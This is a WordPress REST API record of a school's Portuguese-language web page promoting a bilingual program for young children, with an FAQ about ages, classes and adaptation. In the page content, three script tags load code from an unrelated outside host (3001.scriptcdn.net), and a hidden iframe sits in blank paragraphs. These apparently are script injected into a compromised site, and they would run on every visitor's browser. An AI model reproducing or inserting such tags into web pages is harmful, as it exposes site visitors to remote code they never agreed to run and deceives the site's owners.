{"id":341,"date":"2023-08-15T08:12:01","date_gmt":"2023-08-15T06:12:01","guid":{"rendered":"https:\/\/wordpress.vecurosoft.com\/kiddino\/?page_id=341"},"modified":"2025-04-11T17:34:11","modified_gmt":"2025-04-11T20:34:11","slug":"projeto-bilingue","status":"publish","type":"page","link":"https:\/\/colegiounicocampinas.com.br\/?page_id=341","title":{"rendered":"Projeto Bil\u00edngue"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"341\" class=\"elementor elementor-341\" data-elementor-settings=\"{&quot;ha_cmc_init_switcher&quot;:&quot;no&quot;}\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f5e2c8e elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"f5e2c8e\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-63fe0be\" data-id=\"63fe0be\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-ded65de elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ded65de\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-31851a0\" data-id=\"31851a0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3d0a65c elementor-widget__width-initial elementor-headline--style-highlight elementor-widget elementor-widget-animated-headline\" data-id=\"3d0a65c\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;highlighted_text&quot;:&quot;Bil\\u00edngue&quot;,&quot;headline_style&quot;:&quot;highlight&quot;,&quot;marker&quot;:&quot;circle&quot;,&quot;loop&quot;:&quot;yes&quot;,&quot;highlight_animation_duration&quot;:1200,&quot;highlight_iteration_delay&quot;:8000}\" data-widget_type=\"animated-headline.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<h3 class=\"elementor-headline\">\n\t\t\t\t\t<span class=\"elementor-headline-plain-text elementor-headline-text-wrapper\">Projeto<\/span>\n\t\t\t\t<span class=\"elementor-headline-dynamic-wrapper elementor-headline-text-wrapper\">\n\t\t\t\t\t<span class=\"elementor-headline-dynamic-text elementor-headline-text-active\">Bil\u00edngue<\/span>\n\t\t\t\t<\/span>\n\t\t\t\t<\/h3>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-479e9cc elementor-widget elementor-widget-text-editor\" data-id=\"479e9cc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"title-divider2\">\u00a0<\/div><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d1592cc elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"d1592cc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div id=\"tw-target-text-container\" class=\"tw-ta-container F0azHf tw-nfl\" tabindex=\"0\" role=\"text\"><p>Nossa metodologia permite que a crian\u00e7a desenvolva flu\u00eancia no segundo idioma de maneira similar a l\u00edngua materna. O aprendizado acontece de forma org\u00e2nica, sem press\u00f5es, de maneira envolvente com atividades l\u00fadicas. Capacitando assim os alunos a adquirirem habilidades lingu\u00edsticas de maneira leve e eficaz. Temos como objetivo ensinar atrav\u00e9s da valoriza\u00e7\u00e3o da capacidade natural de aprendizado de cada crian\u00e7a. <\/p><\/div><pre id=\"tw-target-text\" class=\"tw-data-text tw-text-large tw-ta\" dir=\"ltr\" data-placeholder=\"Tradu\u00e7\u00e3o\" data-ved=\"2ahUKEwjl8Oy73ruKAxXOC7kGHfgvJTEQ3ewLegQIDBAT\" aria-label=\"Texto traduzido: O Col\u00e9gio \u00danico est\u00e1 empenhado em promover um ambiente educacional estimulante, alegre e seguro que atenda \u00e0s necessidades intelectuais, espirituais, f\u00edsicas, morais e culturais de nossos alunos.\"><span class=\"Y2IQFc\" lang=\"pt\">O Col\u00e9gio \u00danico busca despertar, inspirar e desenvolver em nossos alunos, sua vontade natural em aprender, oferecendo um espa\u00e7o m\u00e1gico onde possam se aventurar no mundo bil\u00edngue com muita divers\u00e3o e aprendizado.<\/span><\/pre><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-dd87b62 elementor-widget elementor-widget-text-editor\" data-id=\"dd87b62\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 class=\"h6 pt-1 text-uppercase\">Aulas todos os dias: Segunda \u2013 Sexta<\/h3>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-399a05b elementor-widget elementor-widget-text-editor\" data-id=\"399a05b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"row gx-50\"><div class=\"col-auto\"><div class=\"info-style1\"><p class=\"info-title\">Per\u00edodo Integral:<\/p><p class=\"info-text\">Duas vezes por dia &#8211; manh\u00e3 e tarde<\/p><\/div><\/div><div class=\"col-auto\"><div class=\"info-style1\">\u00a0<\/div><\/div><div class=\"col-auto\"><div class=\"info-style1\"><p class=\"info-text\">\u00a0<\/p><\/div><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-d4fa0ce\" data-id=\"d4fa0ce\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7e506e2 elementor-widget elementor-widget-kiddinoimagebox\" data-id=\"7e506e2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinoimagebox.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"img-box7 imagebox-wraper \">\r\n\t\t\t    <div class=\"mega-hover\">\n        <img decoding=\"async\" src=\"http:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2024\/12\/bilingue.png\" alt=\"teacher\"  class=\"w-100\" \/>    <\/div>\n\t\t<\/div>\r\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-9fe327b elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9fe327b\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-a34bc90\" data-id=\"a34bc90\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-aa7f4b2 elementor-widget elementor-widget-heading\" data-id=\"aa7f4b2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">D\u00favidas<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-e9d72dc elementor-widget elementor-widget-text-editor\" data-id=\"e9d72dc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"title-divider2\"><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1cf5d3b elementor-widget elementor-widget-kiddinofaq\" data-id=\"1cf5d3b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinofaq.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"accordion accordion-style1 \" id=\"faqWidget_6a00be1643e4b\"><div class=\"accordion-item accordion-box active\"><div class=\"accordion-header\" id=\"faq_6a00be1643e55\"><button class=\"accordion-button \" type=\"button\" data-bs-toggle=\"collapse\" data-bs-target=\"#faq_6a00be1643e55_collapse\" aria-expanded=\"true\" aria-controls=\"faq_6a00be1643e55_collapse\">\u00c9 indicado para qual idade?<\/button><\/div><div id=\"faq_6a00be1643e55_collapse\" class=\"accordion-collapse collapse show\" aria-labelledby=\"faq_6a00be1643e55\" data-bs-parent=\"#faqWidget_6a00be1643e4b\"><div class=\"accordion-body\"><p>As crian\u00e7as iniciam o Projeto Bil\u00edngue a partir do maternal (2 - 3 anos de idade).\n<\/p><\/div><\/div><\/div><div class=\"accordion-item accordion-box \"><div class=\"accordion-header\" id=\"faq_6a00be1643e62\"><button class=\"accordion-button collapsed\" type=\"button\" data-bs-toggle=\"collapse\" data-bs-target=\"#faq_6a00be1643e62_collapse\" aria-expanded=\"false\" aria-controls=\"faq_6a00be1643e62_collapse\">Onde s\u00e3o ministradas as aulas?<\/button><\/div><div id=\"faq_6a00be1643e62_collapse\" class=\"accordion-collapse collapse \" aria-labelledby=\"faq_6a00be1643e62\" data-bs-parent=\"#faqWidget_6a00be1643e4b\"><div class=\"accordion-body\"><p>O Projeto Bil\u00edngue possui sala pr\u00f3pria com toda a infraestrutura necess\u00e1ria para o amplo desenvolvimento do aprendizado.\n<\/p><\/div><\/div><\/div><div class=\"accordion-item accordion-box \"><div class=\"accordion-header\" id=\"faq_6a00be1643e6b\"><button class=\"accordion-button collapsed\" type=\"button\" data-bs-toggle=\"collapse\" data-bs-target=\"#faq_6a00be1643e6b_collapse\" aria-expanded=\"false\" aria-controls=\"faq_6a00be1643e6b_collapse\">Como funcionam as din\u00e2micas das aulas?<\/button><\/div><div id=\"faq_6a00be1643e6b_collapse\" class=\"accordion-collapse collapse \" aria-labelledby=\"faq_6a00be1643e6b\" data-bs-parent=\"#faqWidget_6a00be1643e4b\"><div class=\"accordion-body\"><p>As crian\u00e7as aprendem o idioma de maneira l\u00fadica, atrav\u00e9s da conversa\u00e7\u00e3o, atividades manuais, m\u00fasicas e v\u00eddeos.\n<\/p><\/div><\/div><\/div><div class=\"accordion-item accordion-box \"><div class=\"accordion-header\" id=\"faq_6a00be1643e72\"><button class=\"accordion-button collapsed\" type=\"button\" data-bs-toggle=\"collapse\" data-bs-target=\"#faq_6a00be1643e72_collapse\" aria-expanded=\"false\" aria-controls=\"faq_6a00be1643e72_collapse\">Qual calend\u00e1rio utilizam?<\/button><\/div><div id=\"faq_6a00be1643e72_collapse\" class=\"accordion-collapse collapse \" aria-labelledby=\"faq_6a00be1643e72\" data-bs-parent=\"#faqWidget_6a00be1643e4b\"><div class=\"accordion-body\"><p>No Projeto Bil\u00edngue as crian\u00e7as desenvolvem atividades de acordo com as comemora\u00e7\u00f5es e feriados do calend\u00e1rio americano (EUA).\n<\/p><\/div><\/div><\/div><div class=\"accordion-item accordion-box \"><div class=\"accordion-header\" id=\"faq_6a00be1643e78\"><button class=\"accordion-button collapsed\" type=\"button\" data-bs-toggle=\"collapse\" data-bs-target=\"#faq_6a00be1643e78_collapse\" aria-expanded=\"false\" aria-controls=\"faq_6a00be1643e78_collapse\">Meu filho vai se adaptar?<\/button><\/div><div id=\"faq_6a00be1643e78_collapse\" class=\"accordion-collapse collapse \" aria-labelledby=\"faq_6a00be1643e78\" data-bs-parent=\"#faqWidget_6a00be1643e4b\"><div class=\"accordion-body\"><p>Sem d\u00favida, \u00e9 a aula favorita de 100% dos nossos alunos.<\/p><\/div><\/div><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<div class=\"elementor-element elementor-element-73b8d4d elementor-headline--style-highlight elementor-widget elementor-widget-animated-headline\" data-id=\"73b8d4d\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;marker&quot;:&quot;double_underline&quot;,&quot;highlighted_text&quot;:&quot;de verdade&quot;,&quot;headline_style&quot;:&quot;highlight&quot;,&quot;loop&quot;:&quot;yes&quot;,&quot;highlight_animation_duration&quot;:1200,&quot;highlight_iteration_delay&quot;:8000}\" data-widget_type=\"animated-headline.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<h3 class=\"elementor-headline\">\n\t\t\t\t\t<span class=\"elementor-headline-plain-text elementor-headline-text-wrapper\">Aqui se aprende <\/span>\n\t\t\t\t<span class=\"elementor-headline-dynamic-wrapper elementor-headline-text-wrapper\">\n\t\t\t\t\t<span class=\"elementor-headline-dynamic-text elementor-headline-text-active\">de verdade<\/span>\n\t\t\t\t<\/span>\n\t\t\t\t<\/h3>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-ed55c26 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ed55c26\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-8ced100\" data-id=\"8ced100\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-051fa4b elementor-widget elementor-widget-kiddinoimagebox\" data-id=\"051fa4b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinoimagebox.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"img-box4 imagebox-wraper \">\r\n\t\t\t    <div class=\"img-1 mega-hover\">\n        <img decoding=\"async\" src=\"http:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/SaveClip.App_468566332_18338995270177716_6902029883019628648_n.jpg\" alt=\"about\"  \/>            <\/div>\n\t\t<\/div>\r\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Projeto Bil\u00edngue \u00a0 Nossa metodologia permite que a crian\u00e7a desenvolva flu\u00eancia no segundo idioma de maneira similar a l\u00edngua materna. O aprendizado acontece de forma org\u00e2nica, sem press\u00f5es, de maneira envolvente com atividades l\u00fadicas. Capacitando assim os alunos a adquirirem habilidades lingu\u00edsticas de maneira leve e eficaz. Temos como objetivo ensinar atrav\u00e9s da valoriza\u00e7\u00e3o da&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"class_list":["post-341","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=341"}],"version-history":[{"count":24,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/341\/revisions"}],"predecessor-version":[{"id":5764,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/341\/revisions\/5764"}],"wp:attachment":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}